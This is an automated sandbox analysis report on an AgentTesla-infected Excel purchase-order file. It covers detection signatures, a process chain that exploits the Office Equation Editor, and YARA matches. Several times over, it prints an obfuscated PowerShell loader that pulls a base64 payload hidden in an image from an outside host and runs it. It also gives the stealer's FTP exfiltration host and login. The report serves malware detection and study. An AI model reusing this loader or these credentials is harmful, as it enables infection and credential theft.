Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
orden de compra.xlam.xlsx

Overview

General Information

Sample name:orden de compra.xlam.xlsx
Analysis ID:1465900
MD5:2f9a02c106854721a8c4fbdef77e6bd1
SHA1:626be0171e875f0be6a67e72c92e2c0bd190d51c
SHA256:b053d32b3179667b0f2ecfbd8ef2ba4ea80e0ed27106847282b72a3778ada68f
Tags:xlamxlsx
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1308 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • EQNEDT32.EXE (PID: 976 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 2884 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 2200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • AddInProcess32.exe (PID: 3000 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
          • AddInProcess32.exe (PID: 1652 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.horeca-bucuresti.ro", "Username": "americas2@horeca-bucuresti.ro", "Password": "H*TE9iL;x61m"}
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x27b:$s1: <legacyDrawing r:id="
  • 0x2a3:$s2: <oleObject progId="
  • 0x2ea:$s3: autoLoad="true"
SourceRuleDescriptionAuthorStrings
00000009.00000002.618799471.0000000002545000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.478863572.0000000002545000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.481125469.0000000003499000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 10 entries
            SourceRuleDescriptionAuthorStrings
            6.2.powershell.exe.3aa4df8.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              6.2.powershell.exe.3aa4df8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                6.2.powershell.exe.3aa4df8.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x325e7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x32659:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x326e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x32775:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x327df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x32851:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x328e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x32977:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                6.2.powershell.exe.3aa4df8.2.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                • 0x2f7ca:$s2: GetPrivateProfileString
                • 0x2ee9c:$s3: get_OSFullName
                • 0x3050a:$s5: remove_Key
                • 0x306ba:$s5: remove_Key
                • 0x315b1:$s6: FtpWebRequest
                • 0x325c9:$s7: logins
                • 0x32b3b:$s7: logins
                • 0x3584c:$s7: logins
                • 0x358fe:$s7: logins
                • 0x37251:$s7: logins
                • 0x36498:$s9: 1.85 (Hash, version 2, native byte-order)
                8.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 9 entries

                  Exploits

                  barindex
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.243.156, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 976, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 976, TargetFilename: C:\Users\user\AppData\Roaming\portugalslovenia.js

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 976, Protocol: tcp, SourceIp: 192.3.243.156, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); 